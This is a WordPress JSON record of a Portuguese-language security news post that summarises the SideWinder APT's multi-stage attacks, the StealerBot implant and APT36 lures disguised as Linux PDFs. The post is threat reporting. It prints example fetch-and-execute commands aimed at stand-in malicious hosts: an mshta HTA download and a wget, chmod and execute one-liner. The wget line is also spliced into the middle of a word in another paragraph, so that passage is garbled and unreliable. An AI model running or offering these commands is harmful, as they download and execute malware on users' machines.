{"id":21336,"date":"2024-10-20T14:56:30","date_gmt":"2024-10-20T17:56:30","guid":{"rendered":"https:\/\/www.ethicalhacker.com.br\/site\/?p=21336"},"modified":"2024-10-20T14:56:31","modified_gmt":"2024-10-20T17:56:31","slug":"sidewinder-apt-com-ataques-multietapas-furtivos","status":"publish","type":"post","link":"https:\/\/www.ethicalhacker.com.br\/site\/2024\/10\/exploits\/sidewinder-apt-com-ataques-multietapas-furtivos\/","title":{"rendered":"SideWinder APT com ataques multietapas furtivos"},"content":{"rendered":"\n<div class=\"contain-inline-size rounded-md border-[0.5px] border-token-border-medium relative bg-token-sidebar-surface-primary dark:bg-gray-950\">\n<div class=\"flex items-center text-token-text-secondary px-4 py-2 text-xs font-sans justify-between rounded-t-md h-9 bg-token-sidebar-surface-primary dark:bg-token-main-surface-secondary\">\n<p><strong>\u00a0SideWinder APT ataca o Oriente M\u00e9dio e \u00c1frica com ataques multietapas furtivos<\/strong><\/p>\n<p style=\"text-align: justify;\">Nos \u00faltimos meses, um grupo de amea\u00e7as persistentes avan\u00e7adas (APT) conhecido como SideWinder ou APT-C-17, Baby Elephant, Hardcore Nationalist, entre outros tem realizado uma s\u00e9rie de ataques direcionados a entidades de alto perfil e infraestruturas estrat\u00e9gicas no Oriente M\u00e9dio e na \u00c1frica.<\/p>\n<p style=\"text-align: justify;\">Supostamente com la\u00e7os \u00e0 \u00cdndia, o grupo tem se concentrado em alvos importantes, como governos, militares, empresas de telecomunica\u00e7\u00f5es, institui\u00e7\u00f5es financeiras, universidades e ind\u00fastrias de petr\u00f3leo, em pa\u00edses como Bangladesh, Djibouti, Ar\u00e1bia Saudita, Turquia e EAU.<\/p>\n<p style=\"text-align: justify;\">Apesar de ser muitas vezes subestimado como um grupo de baixa qualifica\u00e7\u00e3o devido ao uso de vetores de infec\u00e7\u00e3o conhecidos, como arquivos LNK maliciosos e scripts p\u00fablicos, o SideWinder demonstrou um n\u00edvel de sofistica\u00e7\u00e3o que se revela quando suas opera\u00e7\u00f5es s\u00e3o analisadas em profundidade.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Estrutura multietapas do ataque<\/strong><\/p>\n<p style=\"text-align: justify;\">O diferencial mais significativo das campanhas recentes do SideWinder \u00e9 o uso de uma cadeia de infec\u00e7\u00e3o multietapas para implantar um conjunto de ferramentas p\u00f3s-explora\u00e7\u00e3o in\u00e9dito, chamado StealerBot.<\/p>\n<p style=\"text-align: justify;\">Este malware avan\u00e7ado tem como objetivo principal a espionagem, permitindo a instala\u00e7\u00e3o de m\u00f3dulos adicionais para roubo de informa\u00e7\u00f5es, captura de credenciais, entre outras atividades maliciosas.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Fase 1: Spear-Phishing<\/strong><\/p>\n<p style=\"text-align: justify;\">O ataque come\u00e7a com um e-mail de spear-phishing direcionado, contendo um anexo que pode ser um arquivo ZIP com um atalho do Windows (LNK) ou um documento do Microsoft Office. Esses arquivos, ao serem abertos, executam uma s\u00e9rie de scripts intermedi\u00e1rios em JavaScript e .NET, que eventualmente levam \u00e0 instala\u00e7\u00e3o do StealerBot.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Exemplo de documento malicioso<\/strong><\/p>\n<ul>\n<li style=\"text-align: justify;\">O documento malicioso utiliza a t\u00e9cnica de inje\u00e7\u00e3o de modelo remoto para baixar um arquivo RTF armazenado em um servidor controlado pelo atacante.<\/li>\n<li style=\"text-align: justify;\">Esse arquivo RTF explora uma vulnerabilidade antiga (CVE-2017-11882), permitindo a execu\u00e7\u00e3o de c\u00f3digo JavaScript adicional, que ent\u00e3o baixa mais scripts hospedados em sites maliciosos.<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>Fase 2: Arquivo LNK e mshta.exe<\/strong><\/p>\n<p style=\"text-align: justify;\">Outro vetor comum \u00e9 o uso de arquivos LNK maliciosos que empregam o utilit\u00e1rio mshta.exe, uma ferramenta nativa do Windows, para executar arquivos HTML maliciosos (HTA). Esses arquivos HTA cont\u00eam c\u00f3digo JavaScript que, novamente carrega e executa uma s\u00e9rie de comandos que levam \u00e0 instala\u00e7\u00e3o do StealerBot.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Exemplo de Uso do mshta.exe<\/strong><\/p>\n<p>O mshta baixa e executa o conte\u00fado HTML malicioso que desencadeia a cadeia de infec\u00e7\u00e3o.<\/p>\n<p><strong>mshta http:\/\/site-malicioso[.]com\/malicious.hta<\/strong><\/p>\n<p>\u00a0<\/p>\n<p><strong>Fase 3: Persist\u00eancia e backdoor<\/strong><\/p>\n<p style=\"text-align: justify;\">Uma vez que o sistema est\u00e1 comprometido, o malware executa um backdoor conhecido desde 2020, que foi recentemente atualizado. Este backdoor evita detec\u00e7\u00e3o e ajusta seu comportamento dependendo das solu\u00e7\u00f5es de seguran\u00e7a instaladas na m\u00e1quina alvo.<\/p>\n<p>\u00a0<\/p>\n<ul>\n<li style=\"text-align: justify;\">O backdoor mant\u00e9m a persist\u00eancia no sistema e carrega m\u00f3dulos adicionais conforme necess\u00e1rio.<\/li>\n<li style=\"text-align: justify;\">Uma caracter\u00edstica interessante \u00e9 que nas vers\u00f5es mais recentes, o malware carrega arquivos sem extens\u00e3o do diret\u00f3rio atual, o que ajuda a evitar sua detec\u00e7\u00e3o por solu\u00e7\u00f5es de seguran\u00e7a tradicionais.<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>Fase 4: StealerBot &#8211; Ferramenta modular avan\u00e7ada<\/strong><\/p>\n<p>O objetivo final do ataque \u00e9 implantar o StealerBot, um implante modular avan\u00e7ado baseado em .NET. O StealerBot \u00e9 capaz de realizar diversas a\u00e7\u00f5es maliciosas, incluindo:<\/p>\n<p>\u00a0<\/p>\n<ul>\n<li>Instala\u00e7\u00e3o de malware adicional usando um downloader em C++.<\/li>\n<li>Captura de telas e registro de teclas digitadas (keylogging).<\/li>\n<li>Roubo de senhas armazenadas em navegadores.<\/li>\n<li>Intercep\u00e7\u00e3o de credenciais RDP.<\/li>\n<li>Roubo de arquivos locais.<\/li>\n<li>Execu\u00e7\u00e3o de shell reverso, permitindo controle remoto do sistema.<\/li>\n<li>Phishing de credenciais do Windows.<\/li>\n<li>Eleva\u00e7\u00e3o de privil\u00e9gios no sistema, bypassando o Controle de Conta de Usu\u00e1rio (UAC).<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>Exemplo de uso do StealerBot<\/strong><\/p>\n<p style=\"text-align: justify;\">Uma vez implantado, o StealerBot \u00e9 gerenciado por um m\u00f3dulo principal chamado Orchestrator, que se comunica com o servidor de comando e controle (C2) do atacante e carrega os diferentes m\u00f3dulos necess\u00e1rios para a opera\u00e7\u00e3o maliciosa.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Fase 5: Atualiza\u00e7\u00f5es e Evolu\u00e7\u00e3o do SideWinder<\/strong><\/p>\n<p style=\"text-align: justify;\">Al\u00e9m do StealerBot, o SideWinder utiliza componentes chamados InstallerPayload e InstallerPayload_NET, que n\u00e3o fazem parte da cadeia de ataque principal, mas s\u00e3o usados para instalar novas vers\u00f5es do StealerBot ou infectar novos alvos. Isso demonstra a capacidade do grupo de adaptar e atualizar suas ferramentas com o tempo, tornando-se cada vez mais perigoso.<\/p>\n<p>\u00a0<\/p>\n<\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"loaded aligncenter\" title=\"Multi-Stage Attack\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiwZxtdR8upaXr-4x-NRgWFYdMMG3Su9gcUYG7nKdl57XP0Ne7irvYlPyOxmGJSMh44JgwLtWViLywDb671ccg-6Y5WkiHCUfcPi5Totdk05gKsLZXVyJiG84fVCXUnKttlUl9K4LyKDx3ZufbU-vs9xasNmnR2Btx4xxH6QVQ1Kppa-uwErRfyz6DIKglj\/s728-rw-e365\/SideWinder.png\" alt=\"Multi-Stage Attack\" width=\"540\" height=\"425\" border=\"0\" data-original-height=\"951\" data-original-width=\"1208\" \/><\/p>\n<div class=\"flex items-center text-token-text-secondary px-4 py-2 text-xs font-sans justify-between rounded-t-md h-9 bg-token-sidebar-surface-primary dark:bg-token-main-surface-secondary\">\n<p>\u00a0<\/p>\n<p><strong>Expans\u00e3o geogr\u00e1fica e colabora\u00e7\u00e3o com outros grupos<\/strong><\/p>\n<p style=\"text-align: justify;\">O SideWinder tem expandido seu alcance geogr\u00e1fico para al\u00e9m do Oriente M\u00e9dio e da \u00c1frica, focando em entidades diplom\u00e1ticas na Fran\u00e7a, China, \u00cdndia, Indon\u00e9sia e Marrocos. Al\u00e9m disso, novas infraestruturas de ataque, como o Mythic post-exploitation framework, foram associadas a outro gwget http:\/\/servidor-malicioso[.]com\/malicious.pdf &amp;&amp; chmod +x malicious.pdf &amp;&amp; .\/malicious.pdfrupo APT, o Transparent Tribe (tamb\u00e9m conhecido como APT36), que tem origem no Paquist\u00e3o.<\/p>\n<p>\u00a0<\/p>\n<p style=\"text-align: justify;\">Al\u00e9m do StealerBot, o SideWinder utiliza componentes chamados InstallerPayload e InstallerPayload_NET, que n\u00e3o fazem parte da cadeia de ataque principal, mas s\u00e3o usados para instalar novas vers\u00f5es do StealerBot ou infectar novos alvos. Isso demonstra a capacidade do grupo de adaptar e atualizar suas ferramentas com o tempo, tornando-se cada vez mais perigoso.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Amea\u00e7as em ambientes Linux<\/strong><\/p>\n<p style=\"text-align: justify;\">Outro ponto alarmante \u00e9 o aumento de ataques a ambientes Linux. Grupos como o APT36 t\u00eam distribu\u00eddo arquivos de entrada de desktop do Linux disfar\u00e7ados de PDFs, que ao serem executados, baixam bin\u00e1rios maliciosos, garantindo acesso persistente e evitando a detec\u00e7\u00e3o.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Exemplo de ataque em ambientes Linux<\/strong><\/p>\n<p>Esse comando baixa o PDF disfar\u00e7ado, que na verdade cont\u00e9m scripts para baixar e executar um bin\u00e1rio malicioso.<\/p>\n<p><strong>wget http:\/\/servidor-malicioso[.]com\/malicious.pdf &amp;&amp; chmod +x malicious.pdf &amp;&amp; .\/malicious.pdf<\/strong><\/p>\n<\/div>\n<div class=\"sticky top-9 md:top-[5.75rem]\">\n<div class=\"absolute bottom-0 right-2 flex h-9 items-center\">\n<div class=\"flex items-center rounded bg-token-sidebar-surface-primary px-2 font-sans text-xs text-token-text-secondary dark:bg-token-main-surface-secondary\">\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>\n<p><strong>Conclus\u00e3o<\/strong><\/p>\n<p style=\"text-align: justify;\">O grupo SideWinder APT continua a se destacar por sua abordagem furtiva e sofisticada, utilizando cadeias de infec\u00e7\u00e3o multietapas para comprometer alvos estrat\u00e9gicos no Oriente M\u00e9dio e na \u00c1frica. A evolu\u00e7\u00e3o de suas ferramentas, como o StealerBot, aliado ao aumento de ataques contra ambientes Linux por parte de outros grupos APT, como o APT36, destaca a necessidade de vigil\u00e2ncia cont\u00ednua e medidas de seguran\u00e7a robustas por parte de organiza\u00e7\u00f5es em setores cr\u00edticos.<\/p>\n<p>\u00a0<\/p>\n<p style=\"text-align: justify;\">A prote\u00e7\u00e3o contra esses ataques requer n\u00e3o apenas a implementa\u00e7\u00e3o de solu\u00e7\u00f5es de seguran\u00e7a avan\u00e7adas, mas tamb\u00e9m treinamento cont\u00ednuo de colaboradores para reconhecer tentativas de spear-phishing e outras t\u00e9cnicas de engenharia social.<\/p>\n<p>\u00a0<\/p>\n<\/div>\n<\/div>\n<p>Fonte e imagens: <a href=\"https:\/\/thehackernews.com\/2024\/10\/sidewinder-apt-strikes-middle-east-and.html\" target=\"_blank\" rel=\"noopener\">https:\/\/thehackernews.com\/2024\/10\/sidewinder-apt-strikes-middle-east-and.html<\/a><\/p>\n<p>\u00a0<\/p>\n<\/div>\n<\/div>\n\n\n","protected":false},"excerpt":{"rendered":"<p>\u00a0SideWinder APT ataca o Oriente M\u00e9dio e \u00c1frica com ataques multietapas furtivos Nos \u00faltimos meses, um grupo de amea\u00e7as persistentes avan\u00e7adas (APT) conhecido como SideWinder ou APT-C-17, Baby Elephant, Hardcore Nationalist, entre outros tem realizado uma s\u00e9rie de ataques direcionados a entidades de alto perfil e infraestruturas estrat\u00e9gicas no Oriente M\u00e9dio e na \u00c1frica. Supostamente [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":21342,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[89,100,21,105],"tags":[],"class_list":["post-21336","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-basico","category-diversos","category-exploits","category-noticias"],"_links":{"self":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/21336","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/comments?post=21336"}],"version-history":[{"count":13,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/21336\/revisions"}],"predecessor-version":[{"id":21350,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/21336\/revisions\/21350"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media\/21342"}],"wp:attachment":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media?parent=21336"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/categories?post=21336"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/tags?post=21336"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}